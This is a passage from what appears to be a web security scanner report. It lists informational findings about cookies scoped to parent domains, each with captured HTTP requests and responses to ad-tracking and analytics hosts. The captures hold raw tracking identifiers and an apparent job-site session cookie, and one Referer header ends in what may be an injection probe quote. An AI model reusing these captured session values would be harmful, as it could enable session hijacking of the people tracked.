The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; _HOP=; MUID=B506C07761D7465D924574124E3C14DF; OrigMUID=B506C07761D7465D924574124E3C14DF%2c2d5571d309564964970af86c3c5fef46; _SS=SID=54196B2489E649DC9D985351F7EDDDA0&CW=983&CH=903; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&RedC=c.bing.com&MXFR=B506C07761D7465D924574124E3C14DF
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=B506C07761D7465D924574124E3C14DF&TUID=1; domain=.bing.com; expires=Thu, 17-Nov-2011 23:32:33 GMT; path=/;
Date: Sun, 01 May 2011 23:32:32 GMT
Content-Length: 0

16.29. http://c.statcounter.com/t.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.statcounter.com
Path:   /t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=6811643&resolution=1920&h=1200&camefrom=&u=http%3A//bizinformation.co/www.onlinemicrofiche.com&t=www.Onlinemicrofiche.com&java=1&security=0e4e73f2&sc_random=0.7098396345973015&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique_1=sc6761715.1303907356.0; is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc2226915.1303083753.0-1656416.1303217091.0-6426596.1303907356.0-6811643.1304302344.0; expires=Sat, 30-Apr-2016 02:12:24 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;
16.30. http://clk.atdmt.com/CNT/go/319741851/direct/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /CNT/go/319741851/direct/01/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/319741851/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3; expires=Tuesday, 30-Apr-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Sun, 01 May 2011 23:32:51 GMT
Connection: close

16.31. http://csc.beap.ad.yieldmanager.net/i  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://csc.beap.ad.yieldmanager.net
Path:   /i

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i?bv=1.0.0&bs=(12843fkhk(gid$BZVHFWKIRliKRmeZTatPkQC2rcHW80297a8AAiBt,st$1304292783218678,v$1.0))&t=J-D&al=(as$12c6r0iom,aid$iFueFUwN7y4-,bi$589320551,ct$25,at$H)&s=0&r=0.17090801848098636&SIG=10v2lvu5s;x-cookie=8xuw7w56dzwfu&o=4&f=qx HTTP/1.1
Host: csc.beap.ad.yieldmanager.net
Proxy-Connection: keep-alive
Referer: http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=110

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=120;path=/; expires=Tue, 01-May-2013 20:00:00 GMT;domain=.yieldmanager.net
Set-Cookie: S=s=4c2m2vh6rrrg2&t=1304292866;path=/; expires=
Cache-Control: no-cache, private
Accept-Charset: utf-8
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
16.32. http://ib.adnxs.com/getuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYAiACKAIw447n7QQQ447n7QQYAQ..; sess=1; uuid2=2724386019227846218; anj=Kfw))ByDuq(FJl:c9U(O<@CeVOmEXW1hL>#/*4Jn(uor=(5EBh5<W.k)Y><WiS:LOiybjU0r>wWIql]AvGq/IdS!acC(FaP$cYJ!J#h1Y$?7kmw?YIqgimiBWWi-dkyfpjFRO44ek(e!)zV^HsoI@m5(lVJ]-z44hi<@/+Gxw$#QV%Etka*a%eva$=@Au!AJSu6uj*@oO@]EL5n0EQo`R]:t/`eU_45K!c^VKH`O2$i'@`s.wMV-wH9)D=aab*.arK7xs@L$@.CbO?Kb?0ZuKR(FN+u4M#Er2:Iua<E_XvS:>yEy6m-9JBYXUm+V1/.@>oBLAQ/P^+8=*EjA[(GADvf*BbS#E1e?YTKA$'LPYDp0.fkASgZh0i(^P[N`AV7o.$d3BYa-u[VwBx:I(G/:381kcgHWoswb:=`Ku>u@Cidi%Y$u9`qSJ<7rlOS'j/U/>:p6qkC9x[=9>gzl!f)'vJRUdB!F`KgLFB[sgim_V^-4E!hC:TT[Mnnesvth<EqmD]T6X<+EXw*eL#7V._]eR7wKz#+Q<jY0)9m4.Ux(+g2x6gtKj2Uf7bK$d-7jQI=`H%cII=9QVL!LY6%gg!la[qizZ#JNdA3x'%jK#?C9j?>vs79'K>b2_7w$cAnjrNM]

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 03-May-2011 02:07:36 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 31-Jul-2011 02:07:36 GMT; domain=.adnxs.com; HttpOnly
Location: http://loadm.exelator.com/load/?p=204&g=011&bi=2724386019227846218&j=0
Date: Mon, 02 May 2011 02:07:36 GMT
Content-Length: 0

16.33. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...
16.34. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=204&g=001&bi=CAESENh7sluIi3Lo5TRo_oosBvM&cver=1&j=0 HTTP/1.1
Host: loadm.exelator.com
Proxy-Connection: keep-alive
Referer: http://loadus.exelator.com/load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 302 Found
X-Cnection: close
X-Powered-By: PHP/5.2.1
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: BFF=eJylk8FugzAMht%252BFJ0icZCnhAmOHIhUqDYTYaepx5x67vXtTglInjek2rv78%252F8T498kAmMvZcGWyHphsuvqb8TLPc5UVX7asWWGpMFl77Ib94eNzbPpmyIqTEeoXQoYpBuBBrNGeREYDZ7K9dcMCuAVqqaNS0CsSoCNMOqo3MFkGrt6mZeAXR3eABnYUA%252FAg1mhPIqP3diq5%252FboGBMRcT3TmjO84i0D1OjwCMddxp1%252FiGC4xmMnRxEwWxBq%252FxBH3a2QE6QffOQYSfehBpVHGVl1ryrVOqPCagfoljtJrVol3zhpBv9PxxDtnz1D1s3pJyaOR1IXItQv57znQqScD%252Fvc8P4kvndKngdyUuw3x2pCilbBcAf0YadM%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyVk00OgyAQRu%252FiCWYG5GfceIxuXbho0l27M969UK2oAwYXBiTvke8THJgUT29G4oZA99Bi772nphuYeHoyduFpLYQB%252FtNZ8G3k1Ymnbnnde3bT6oywBvpIOlpJknuPj%252FE1fMamYJhMC4xxDGRb68RjhhcdtEyGa7JVqzPCeG69kaqQiTDfAa950QHlOew7BK3W%252BN0RdD0A5ZK51DlMI68Tj94rS6VzxAvTAzqRsWweM57vca1naj27aXVGWEN3J1O8ZpD9h%252BX3PvL3uifvVvdFqzPmL8HjKUg%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:58:25 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFjjEOgDAMA%252F%252FCC%252BxAIU0fE3XszIj6dwqVkKADW6Szc84221EsxhhS7jfSblSbGDb45oLFEejinFIxPlTlolQHxNGpfOjVBTutTQMq0UR8i8ZX9d60tqj8RcdNL2s9AYowOVA%253D; expires=Tue, 30-Aug-2011 01:58:26 GMT; path=/; domain=.exelator.com
Location: http://load.s3.amazonaws.com/pixel.gif
Content-Length: 0
Date: Mon, 02 May 2011 01:58:26 GMT
Server: HTTP server

16.35. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...
16.36. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3669 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: map.media6degrees.com
Cookie: clid=2lgj1xn01171tpz736nle06u0000000117010701201; ipinfo=2lgj1xn0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2lgj1xn01171tpz736nle06u40p9l0023d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: ipinfo=2lkjr780zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sglst=2020sag3lkjr78000000013d010j015010tglkjr78000000013d010j01501; Domain=media6degrees.com; Expires=Sat, 29-Oct-2011 02:35:32 GMT; Path=/
Set-Cookie: vstcnt=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 02 May 2011 02:35:31 GMT

GIF89a.............!.......,...........D..;
16.37. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692?AQB=1&ndh=1&t=1%2F4%2F2011%2023%3A33%3A45%200%20300&ce=UTF-8&ns=wpni&pageName=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&g=http%3A%2F%2Fwww.washingtonpost.com%2Fwl%2Fjobs%2Fhome%3Fwpsrc%3DAG0002174%26keyword%3D4846831919%26cre%3D430450907%26g%3D1%26s_kwcid%3DTC-21380-4846831919-e-430450907&cc=USD&ch=wp%20-%20jobs&server=washingtonpost.com%20jobs&v0=AG0002174&events=event1&v1=wp%20-%20front%20-%20jobs%20section%20front%20-%20front&h1=jobs%7Cfront&v2=wp%20-%20jobs&h2=washingtonpost.com%7Cjobs%7Cfront&c8=Monday&c9=12%3A30AM&c10=Weekday&v14=New&v15=First%20Visit&v16=1&c17=First%20Visit&c18=New&c23=jobs%7Cfront&c32=application%20-%20jobs%20cluster%20-%20jobs&c33=anonymous&c34=Commercial&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=983&bh=903&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650; rss_now=false; wp_pageview=1; __qseg=Q_D|Q_T|Q_2919|Q_2917|Q_1665|Q_1656|Q_1647|Q_1645; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DAG0002174%3B%20s_dslv%3DFirst%2520Visit%3B; s_pers=%20s_nr%3D1304310825793-New%7C1306902825793%3B%20s_lv%3D1304310825795%7C1398918825795%3B%20s_lv_s%3DFirst%2520Visit%7C1304312625795%3B%20s_vmonthnum%3D1306904400800%2526vn%253D1%7C1306904400800%3B%20s_monthinvisit%3Dtrue%7C1304312625800%3B

Response

HTTP/1.1 302 Found
Date: Sun, 01 May 2011 23:34:44 GMT
